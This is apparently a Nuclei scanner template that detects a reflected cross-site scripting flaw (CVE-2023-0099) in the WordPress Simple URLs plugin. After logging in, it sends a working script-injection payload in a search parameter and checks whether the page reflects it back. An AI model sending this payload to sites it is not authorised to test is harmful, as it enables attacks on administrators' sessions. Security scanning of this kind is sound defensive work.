nuclei-templates/http/cves/2023/CVE-2023-0099.yaml

53 lines
2.1 KiB
YAML

id: CVE-2023-0099
info:
name: Simple URLs < 115 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
impact: |
Successful exploitation of this vulnerability can lead to session hijacking, defacement of websites, theft of sensitive information, and potential remote code execution.
remediation: Fixed in version 115
reference:
- https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8
- https://wordpress.org/plugins/simple-urls/
- https://nvd.nist.gov/vuln/detail/CVE-2023-0099
- http://packetstormsecurity.com/files/176983/WordPress-Simple-URLs-Cross-Site-Scripting.html
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0099
cwe-id: CWE-79
epss-score: 0.00109
epss-percentile: 0.43829
cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: getlasso
product: simple_urls
framework: wordpress
tags: wpscan,packetstorm,cve,cve2023,xss,simple-urls,authenticated,wordpress,wp,wp-plugin,getlasso
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body, "</script><svg/onload=alert(document.domain)>")'
- 'contains(body_2, "search_term")'
condition: and
# digest: 4a0a00473045022100e1e3263b6d6d0a0c9237713a1f7732ebd9b9d49e7f9807d85154d0f4831dbb6b02201fa389258a3890e6ff4642ec5ac60d8bb9b0983f1616cb00de1abd6824382ac0:922c64590222798bb761d5b6d8e72950